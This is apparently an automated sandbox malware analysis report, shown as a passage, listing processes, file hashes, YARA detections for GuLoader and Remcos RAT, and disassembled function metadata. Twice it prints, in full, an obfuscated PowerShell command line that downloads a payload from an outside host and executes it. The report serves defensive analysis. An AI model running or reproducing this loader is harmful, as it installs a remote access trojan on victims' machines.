VanrPhreoMiskpPolyITa.ssForumBer +Kred+Grov%Vile$ModecTeknHJadeoGranklgtnSFrusTForuA.harRPanhT,owlEStarrTvrenMobbEViol.TarocFo ooI dhUInten O et') ;$Injuriesag=$Chokstarterne[$Preeducated]}$Planeta=299772;$Makrokaldene218=31361;Myndiges (Katukina 'Vand$KortG BrnLslavOM ttBstorAA skLTiam:Di,ii AffD.kulyA laXPr.eKSrmrADggeT ekAInteLAc ioCairgSkureEyesR Hal Fja= rfe Vi.GBedueTrimtAfsl-ReteC UnmOPatenKultTProcETmreN let Bri Axin$,stemB reOMis,DB civGaudIShouNti tDB evESprjN');Myndiges (Katukina 'Exin$SnusgStral ZefoEnorb xya D,jl Omb:SterPDiscr Dego UsirLockeSubcxtu f Fors= Sta Semi[GumiSCeney PrisIdrttS lpeEx lmPark.GlosCKanooPe.cnAffiv pane delrF,rhtheks]Pers: wro:SammF CherIlmaoDisim Un BMus aStras Reke etr6vrng4 EmpSTelet Bl rNulzinonpnSalogPear(Bran$PeriIUnatdHer yForsx TilkDemia UnctAlk aI.eqlEurooSk.agFremeSkrarFaja)');Myndiges (Katukina 'Gra $,albgTripl reo UniBSe saErfaL C m:Rapij rbeA eeVS,teATilbnDaane aure lu6Tunn7Op n V.sc=Sand Besa[AfhoS NapyGlutsMiscTS.eae inuMfej . HertCroce VagXSkaltMe.v. DeseS ifNChilCRepoOEgetd KenImodsnHa dGs vk]Ant,: O s:G.ayaAnt s AddCBra,i R bISkr .Ge oGJenhEIndsTAnimsUndeT UndRAdspiNonwnUnwhgD.ta(Hy o$HovePMi,lR NovoIndlRUds Ew,neXIndr)');Myndiges (Katukina 'Offi$BrutgpettLBolioBandbano,aMajoLFly :AffakCentA Sktl,attDSkaaaLim,E GrueSkrmrRampeProa= her$ P.lj B raGen VFremaRetinHalmePresEgro,6 .ot7Mure. SupsImpuU KonB FugsLossT BelRMenaiDiscNAs,igFlos(Modu$Unmip Pa lfarmaPropn MimEViolT,ervAMeni,De.e$ToptmInteaBakskA ocr TknOEm.iKStifaSkylL excdBa,oESecrn Crie Hjh2Fo,m1Zing8 For)');Myndiges $Kaldaeere;"
                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:2
                                                                                                                              Start time:00:41:00
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:3
                                                                                                                              Start time:00:41:10
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Teks$ BotUFrkht AnfiProtl Fo bThesj ElgeOpnalP epiRet,gTran.UndiDDechoVu kwblsdn MillVggeoImmaaE sodP odFDueliLandlT gseData( He $Ski I.ermnHypojRegiuEularWondi RejesystsPiezaShamgWine,Comp$Boc MbanqoLydidHetevencaiFinanVaredTonse ontnSpid)';$Modvinden=$asymptotes;Myndiges (Katukina 'M.no$OpsugSediLgramO oodBN miaaab.LRoma:Su pDDaemeDecoTMaskABufoi TanLAudisKal tCrocUSkruDHatiI TjsE Ex.2Merc3Un i9o.er=Taen(Du,aTIsotESulfSHaanT Und-hyppp FruaMisstBaroH Awk s nd$ DozmBirsoSelvD aryV peaIUnepNS,ruDC ltEPicaN ,pl)');while (!$Detailstudie239) {Myndiges (Katukina 'Mois$Er lg ndklKonso Telb bnoaRadil Sur:FullSBrdfmUdryaUnculanhehFeriac sslUnaws gleegrupnSpigsU vi=Tri,$sandE rekfbankf njaeEn.in') ;Myndiges $Frivoliteten142;Myndiges (Katukina 'DelfsRo fTMatraNecrRBuegtRejs-ApplSU siLGla.eTituE Ra,pBrs For4');Myndiges (Katukina 'Heft$KombgLux.lFainoSexcB redA.nhaLForm:,advD PeteEuphtK otABefaiOpgalPakkSSolftAandu .enDMe aI No.E Do.2Over3Poli9 ri= ele(WhenTfilmEK stSBortT ul- BrepDebrAK,hotMen,H Pos Pe,u$NatimManioJo,dDAtteVWasti equnFo sD PhoeM stN U d)') ;Myndiges (Katukina ' oko$PseuG Disl ovoKonobAssea To.LSien:Sccjp Skrrops EOutseSwardUtiluKobbc arbaMesoTWhemePre dNedr=Gang$UningConcLEthnOPrecbS ccaHemiLAthl:LeveG K peAudiOIndbT VanrPhreoMiskpPolyITa.ssForumBer +Kred+Grov%Vile$ModecTeknHJadeoGranklgtnSFrusTForuA.harRPanhT,owlEStarrTvrenMobbEViol.TarocFo ooI dhUInten O et') ;$Injuriesag=$Chokstarterne[$Preeducated]}$Planeta=299772;$Makrokaldene218=31361;Myndiges (Katukina 'Vand$KortG BrnLslavOM ttBstorAA skLTiam:Di,ii AffD.kulyA laXPr.eKSrmrADggeT ekAInteLAc ioCairgSkureEyesR Hal Fja= rfe Vi.GBedueTrimtAfsl-ReteC UnmOPatenKultTProcETmreN let Bri Axin$,stemB reOMis,DB civGaudIShouNti tDB evESprjN');Myndiges (Katukina 'Exin$SnusgStral ZefoEnorb xya D,jl Omb:SterPDiscr Dego UsirLockeSubcxtu f Fors= Sta Semi[GumiSCeney PrisIdrttS lpeEx lmPark.GlosCKanooPe.cnAffiv pane delrF,rhtheks]Pers: wro:SammF CherIlmaoDisim Un BMus aStras Reke etr6vrng4 EmpSTelet Bl rNulzinonpnSalogPear(Bran$PeriIUnatdHer yForsx TilkDemia UnctAlk aI.eqlEurooSk.agFremeSkrarFaja)');Myndiges (Katukina 'Gra $,albgTripl reo UniBSe saErfaL C m:Rapij rbeA eeVS,teATilbnDaane aure lu6Tunn7Op n V.sc=Sand Besa[AfhoS NapyGlutsMiscTS.eae inuMfej . HertCroce VagXSkaltMe.v. DeseS ifNChilCRepoOEgetd KenImodsnHa dGs vk]Ant,: O s:G.ayaAnt s AddCBra,i R bISkr .Ge oGJenhEIndsTAnimsUndeT UndRAdspiNonwnUnwhgD.ta(Hy o$HovePMi,lR NovoIndlRUds Ew,neXIndr)');Myndiges (Katukina 'Offi$BrutgpettLBolioBandbano,aMajoLFly :AffakCentA Sktl,attDSkaaaLim,E GrueSkrmrRampeProa= her$ P.lj B raGen VFremaRetinHalmePresEgro,6 .ot7Mure. SupsImpuU KonB FugsLossT BelRMenaiDiscNAs,igFlos(Modu$Unmip Pa lfarmaPropn MimEViolT,ervAMeni,De.e$ToptmInteaBakskA ocr TknOEm.iKStifaSkylL excdBa,oESecrn Crie Hjh2Fo,m1Zing8 For)');Myndiges $Kaldaeere;"
                                                                                                                              Imagebase:0x350000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2057052918.0000000008E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2057477084.000000000A0B8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2036593483.000000000604E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:4
                                                                                                                              Start time:00:41:10
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:8
                                                                                                                              Start time:00:41:32
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                              Imagebase:0xef0000
                                                                                                                              File size:59'904 bytes
                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:9
                                                                                                                              Start time:00:41:46
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                              Imagebase:0x1f0000
                                                                                                                              File size:59'904 bytes
                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:10
                                                                                                                              Start time:00:41:56
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                              Imagebase:0x1f0000
                                                                                                                              File size:59'904 bytes
                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:11
                                                                                                                              Start time:00:42:05
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                              Imagebase:0x7ff71e800000
                                                                                                                              File size:59'904 bytes
                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Disassembly

                                                                                                                              Reset < >

                                                                                                                                Executed Functions

                                                                                                                                Function 00007FFD9B76AB16 Relevance: .5, Instructions: 471COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1869607605.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b760000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 966b435bb233eea18188042617d74ed9773092da404bb21d962cb5ea524f88ae
                                                                                                                                • Instruction ID: 49704d462f9fa6d13e51be926fdb72a8bf67678e29e7424008599666c1a88ef5
                                                                                                                                • Opcode Fuzzy Hash: 966b435bb233eea18188042617d74ed9773092da404bb21d962cb5ea524f88ae
                                                                                                                                • Instruction Fuzzy Hash: 12F19630A09B8E8FEBA8DF28C8557E977D1FF54310F04426EE85DC72A5DB3499458B82
                                                                                                                                Function 00007FFD9B76B8C2 Relevance: .5, Instructions: 460COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1869607605.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b760000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4e4a64d2148e99ff7514cfcfd0b846d5d44b674684a2629454322d0744ed1425
                                                                                                                                • Instruction ID: 305fa9e9ee3fb4ea47a203dbb65cec5368ddf830e4cbcd338cba775acc7e9963
                                                                                                                                • Opcode Fuzzy Hash: 4e4a64d2148e99ff7514cfcfd0b846d5d44b674684a2629454322d0744ed1425
                                                                                                                                • Instruction Fuzzy Hash: C5E1C430A09E4D8FEBA8DF28C8667E977E1FB55310F04436AD84DC72A5DE7499418B82
                                                                                                                                Function 00007FFD9B838EE4 Relevance: 1.7, Strings: 1, Instructions: 417COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 0-3372436214
                                                                                                                                • Opcode ID: df5861e803e0f8ce2de147835face91fdd12e4145c57ec0c1ec6f66d96b0b823
                                                                                                                                • Instruction ID: 1c67bcf1255ed6873229b5081693bb1d468ee03fb12533a7fd56236b5dbbad2a
                                                                                                                                • Opcode Fuzzy Hash: df5861e803e0f8ce2de147835face91fdd12e4145c57ec0c1ec6f66d96b0b823
                                                                                                                                • Instruction Fuzzy Hash: 6EC13922B0EBCA4FE7669B6848795647BE1EF5A310B0A05FBC45DCB2E3D918AD05C341
                                                                                                                                Function 00007FFD9B8398FA Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 0-3372436214
                                                                                                                                • Opcode ID: 636cf390d3bf6994b58e02ec9eaa4de432e50da184405e458f162254e7118025
                                                                                                                                • Instruction ID: a7621593340dcd25db07c67d5e7ec966838a3b31d0b7b41efc19677b4fe53329
                                                                                                                                • Opcode Fuzzy Hash: 636cf390d3bf6994b58e02ec9eaa4de432e50da184405e458f162254e7118025
                                                                                                                                • Instruction Fuzzy Hash: A961F421A0F7C94FEB629B7848745A47FA0EF57210B0A05FBD499CB1E3DA186D45C392
                                                                                                                                Function 00007FFD9B839130 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 0-3372436214
                                                                                                                                • Opcode ID: 86d4607537e45c02427972a9d10786947a9b93191af949ae18bf491a6016c117
                                                                                                                                • Instruction ID: 51cff5c868791be573e56f763c9fe79d43efa28fa0e817d41a6d280869797a02
                                                                                                                                • Opcode Fuzzy Hash: 86d4607537e45c02427972a9d10786947a9b93191af949ae18bf491a6016c117
                                                                                                                                • Instruction Fuzzy Hash: 1141C732A0EBCA4FEB62DB6848685687FF0EF5A210B0905FFD459DB1E3DA186D05C351
                                                                                                                                Function 00007FFD9B76CFBF Relevance: .7, Instructions: 665COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1869607605.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b760000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a7a9841eeb0005abd67880ad6f4ffc55ec4aa263d7ee2be89eb5febcee7f2f80
                                                                                                                                • Instruction ID: a026311773bc8da8348eb15baf11e967c2087708c25c6e1c907877e1f6e4a6eb
                                                                                                                                • Opcode Fuzzy Hash: a7a9841eeb0005abd67880ad6f4ffc55ec4aa263d7ee2be89eb5febcee7f2f80
                                                                                                                                • Instruction Fuzzy Hash: CA224030A18A4D8FDF98EF58C4A5EAD77E1FFA8304F154269D409D72A5CB35E881CB81
                                                                                                                                Function 00007FFD9B76B4D6 Relevance: .3, Instructions: 332COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1869607605.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b760000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 05fcae9db95040afbe269ac115fc034d5b34d9262a8ebff66fe858b3e5e0e4ab
                                                                                                                                • Instruction ID: fd55275ab0b3700adf45b34e9cd17be94ab7bc90960808d2a8a74238b50b74dc
                                                                                                                                • Opcode Fuzzy Hash: 05fcae9db95040afbe269ac115fc034d5b34d9262a8ebff66fe858b3e5e0e4ab
                                                                                                                                • Instruction Fuzzy Hash: 38B1C630609B4D8FEB68DF28D8567E93BE1FF55310F04426EE84DC72A2DA7499458B82
                                                                                                                                Function 00007FFD9B8389E6 Relevance: .2, Instructions: 173COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c85692670bbc0b293a013453675035c4095af67f657d7afdf1865cd4313892ce
                                                                                                                                • Instruction ID: 521298a5194f38801075c444b94f3b42b1335d1c8cb102d33d2c17ab7753ad85
                                                                                                                                • Opcode Fuzzy Hash: c85692670bbc0b293a013453675035c4095af67f657d7afdf1865cd4313892ce
                                                                                                                                • Instruction Fuzzy Hash: C2512972F0E78A0FE764EB6888655A8B7D1EF59310F1802FED05CC72D7DE2869468742
                                                                                                                                Function 00007FFD9B839656 Relevance: .2, Instructions: 172COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 20656b0a0237ea736bbb102ad452f6113cbe059b64333667730f015c192513c4
                                                                                                                                • Instruction ID: 3efb1e8ef2681d795218d8e542f43fab3e287c4b047f3b62b9e2e383ab45eca8
                                                                                                                                • Opcode Fuzzy Hash: 20656b0a0237ea736bbb102ad452f6113cbe059b64333667730f015c192513c4
                                                                                                                                • Instruction Fuzzy Hash: DF516A32F0F7894FEB64EB6888696A8B7D1EF69310F0801BED05DC72D7DE1869448741
                                                                                                                                Function 00007FFD9B839E66 Relevance: .2, Instructions: 172COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1fff822e3642116f05c2ab711cb0aada90d318de2b59ac8835dc27957984c4c0
                                                                                                                                • Instruction ID: 6a6c287bfc06377726ee93b2d3646cba553c14a89b8af145d37cb0fef0b89bfa
                                                                                                                                • Opcode Fuzzy Hash: 1fff822e3642116f05c2ab711cb0aada90d318de2b59ac8835dc27957984c4c0
                                                                                                                                • Instruction Fuzzy Hash: 31514A32B0E7890FEB64EB6888656A8B7E1FF59310F0805BED05D872E7CE296D44C741
                                                                                                                                Function 00007FFD9B76AFD4 Relevance: .1, Instructions: 91COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1869607605.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b760000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 892ce53b2f11242d243b8742967240bad986348c2dcee0a43b3578f1f1b50d41
                                                                                                                                • Instruction ID: b74a5f54f648bacb82d651501fabb165a61057222b49f2e406b37c8aa627dfd7
                                                                                                                                • Opcode Fuzzy Hash: 892ce53b2f11242d243b8742967240bad986348c2dcee0a43b3578f1f1b50d41
                                                                                                                                • Instruction Fuzzy Hash: 0E312030E19A4DCEFBB49F54CCA6FF93690FF46318F414239D41D861B2DA786A45CA12
                                                                                                                                Function 00007FFD9B833E2A Relevance: .1, Instructions: 85COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e19d201d599bc4fc639f4b86cf516cc0eaf1467ff7931a9411619d5a0bcd92d7
                                                                                                                                • Instruction ID: cd54181c2347f012c2b4fcbe40d17dd0cd3157fb75f0d9a08eb8003d3b135a4a
                                                                                                                                • Opcode Fuzzy Hash: e19d201d599bc4fc639f4b86cf516cc0eaf1467ff7931a9411619d5a0bcd92d7
                                                                                                                                • Instruction Fuzzy Hash: 6C21C522F1EA4F4FE3A5A76C146557462C2EF89210B8A00FAE01CC76EBDE19ED014245
                                                                                                                                Function 00007FFD9B83867D Relevance: .1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a90d608df8d4d6ded824fe90a99eacc3e389afd2d7cce83ba3d969ac0a09378a
                                                                                                                                • Instruction ID: 6ea4b9368ea3c5ad0fdbadf63ed7830685eb20f4c2ef07e0c6dcf6e1346f3eab
